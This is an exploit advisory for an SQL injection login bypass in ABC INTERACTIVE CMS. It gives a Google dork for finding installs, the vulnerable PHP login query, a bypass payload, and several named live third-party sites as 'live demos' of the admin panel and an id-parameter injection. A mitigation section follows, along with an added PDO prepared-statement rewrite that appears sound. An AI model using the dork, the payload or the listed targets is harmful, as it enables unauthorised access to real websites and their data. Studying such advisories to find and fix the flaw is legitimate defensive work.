# Exploit Title : ABC INTERACTIVE CMS Bypass & SQL Injection
# Google Dork : intext:"Web Design & code: ABC INTERACTIVE"
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite: www.MrHoudini.ir
# Date : 9-5-2017
# Vendor Homepage : https://www.abcinteractive.it


[!] Description.:

SQL injection attacks usually target the database, and all of them are the result of programming errors.
If the programmer does not check the inputs correctly, an attacker can send his or her own commands to the database.
If the programmer makes this mistake on the admin page inputs, and those inputs are not checked correctly,
a very bad thing happens: the attacker can log in to the administrator panel
with a password combination that makes the PHP query result evaluate to true.

Request Method :
[+] POST

Vulnerable Module:
[+] Login

Vulnerable Parameter:
[+] (username) and (password)

==================================================
[!] Bug.........:
 
<?php
require_once('any.php');
if($_POST['submit'])
{
    $user=$_POST['user'];   // taken straight from the request, never validated
    $pswd=$_POST['pswd'];   // taken straight from the request, never validated
    // both values are interpolated directly into the SQL string: this is the injection point
    $result=mysql_query("select * from login where user='$user' and pswd='$pswd'");
    $rowcount=mysql_num_rows($result);
    if($rowcount>0)         // any returned row at all is treated as a successful login
    {
        header('Location:any.php');
    }
    else
    {
        echo "bad user";
    }
}
?>

==================================================
[!] PoC.........: 

To bypass the admin login: '= 'or'

==================================================
[!] Live Demo. For Admin Page :

http://www.matericum.com/controlPanel/html/
https://www.abcinteractive.it/controlPanel/
http://www.agencylab.it/controlPanel/html/

Url Target Admin Panel : http://site.com/controlPanel/html/

[!] Live Demo. For SQL Injection :

http://www.matericum.com/essenza.php?id=10

==================================================
[!] Solution...: 


The bug can be averted with PHP functions.
Check the input variables with:
--ctype_digit
--ctype_alnum
And the other functions of the ctype & gettype family.
*For string entries, use the database escaping functions:
--mysql_real_escape_string or sqlite_escape_string or ....
-If such functions are not available for the database:
--str_replace , addslashes
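
As an added example that is not part of this advisory and not ABC INTERACTIVE's code: the login from the bug section rewritten with PDO prepared statements and the ctype checks listed above, plus a validated numeric id lookup of the kind the essenza.php?id= page needs. The `login` table with its `user` and `pswd` columns comes from the vulnerable code above; the DSN, the credentials, the `essenza` table name and the length caps are assumptions. Binding parameters keeps data separate from query text, which is why it is preferred here over the str_replace/addslashes fallback: those escaping helpers depend on the connection charset and are easy to get wrong.

```php
<?php
// Added example, not the vendor's code. Table "login" with columns user/pswd is
// from the advisory; DSN, credentials and the "essenza" table are assumptions.
declare(strict_types=1);

function db(): PDO
{
    // Placeholder DSN and credentials; replace with the site's real values.
    return new PDO(
        'mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASS_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );
}

// Step 1 (the advisory's ctype_alnum advice): accept only the character class
// a username is expected to have. The 64-character cap is an assumption.
function valid_username(string $u): bool
{
    return $u !== '' && strlen($u) <= 64 && ctype_alnum($u);
}

// Step 2: never interpolate request values into SQL; bind them instead.
// Returns true only when a matching row exists. The query keeps the original
// shape (plaintext pswd column) so it is directly comparable with the bug;
// storing password_hash() output and checking with password_verify() is the
// stronger design.
function login(PDO $pdo, string $user, string $pswd): bool
{
    if (!valid_username($user)) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT 1 FROM login WHERE user = :user AND pswd = :pswd');
    $stmt->execute([':user' => $user, ':pswd' => $pswd]);
    return $stmt->fetchColumn() !== false;
}

// For numeric parameters such as essenza.php?id=10: ctype_digit rejects
// anything that is not a plain digit string before any query runs, and the
// value is then bound as an integer. The 10-digit cap is an assumption.
function fetch_essenza(PDO $pdo, string $rawId): ?array
{
    if (!ctype_digit($rawId) || strlen($rawId) > 10) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM essenza WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Request handling, same flow as the original page but with the checks above.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    $pdo = db();
    $user = (string) ($_POST['user'] ?? '');
    $pswd = (string) ($_POST['pswd'] ?? '');
    if (login($pdo, $user, $pswd)) {
        header('Location: any.php');
        exit;
    }
    echo 'bad user';
}
```

With this version a login attempt whose username contains quote characters never reaches the database at all (it fails `valid_username`), and even input that passes the character check is sent as a bound parameter rather than as part of the SQL text, so a row is returned only for a genuine user/password match.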